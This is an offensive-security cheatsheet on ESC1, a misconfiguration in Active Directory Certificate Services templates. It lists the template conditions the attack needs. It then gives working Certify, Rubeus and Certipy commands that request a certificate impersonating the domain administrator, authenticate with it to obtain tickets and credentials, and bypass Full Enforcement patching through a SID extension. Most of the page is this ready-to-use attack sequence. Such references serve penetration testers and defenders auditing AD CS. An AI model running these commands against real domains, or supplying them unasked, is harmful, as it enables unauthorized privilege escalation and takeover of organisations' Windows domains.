Skip to main content

ESC1

A cheatsheet for ESC1 targeting certificate-based authentication vulnerabilities to exploit unauthorized certificate requests and achieve privilege escalation in Windows and Linux environments.

Authors: BobBuilder, otter

For this technique to work we need a certificate template with the following requirements:

  • ENROLLEE_SUPPLIES_SUBJECT attribute enabled: this allows the user that initialized the CSR (certificate request) to specify any SAN (subjectAltName) allowing us to request a certificate as any user in the domain
  • at least one of the following EUK OIDs: Smart Card Logon / PKINIT Authentication / Client Authentication
  • a user that with enrollment rights

Windows

Certificate Request with alternative SAN

.\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator@minions.com

Convert the certificate PEM to pfx

Certificate Authentification

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Linux

Certificate Request with alternative SAN

certipy req -u user1@minions.com -p "pass1" -ca <ca_name> -template <template_name> -upn administrator@minions.com -dc-ip 10.10.10.10

certipy req -u user1@minions.com -p 'pass1' -ca <ca_name> -template <template_name> -upn Administrator -dc-ip <ip>

Note: If we get an error: The NETBIOS connection with the remote host timed out, just try again.

Certificate Authentification

certipy auth -pfx administrator.pfx -dc-ip <ip>

ESC1 in CBA-Patched Environments

When working in an environment in which the CBA (Certificate-based Authentication) patch is set to Full Enforcement, whenever a user requests a certificate for an alternate user, the SID of the requesting user is checked against the SID present in the one present in the szOID_NTDS_CA_SECURITY_EXT extension: if there is no match this technique cannot be performed. So in fully patched environment, the normal

.\Rubeus.exe asktgt /user:administrator /domain:minions.com /certificate:'C:\Temp\esc1.pfx' /password:'SomethingSecure123!' /dc:dc.minions.com /nowrap /ptt

would not work.

To work around this policy we can use Certipy's built-in sidextension argument (present in Certipy as well under extensionsid)

.\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com

You can see more about how the extension works and its uses here.

Back to top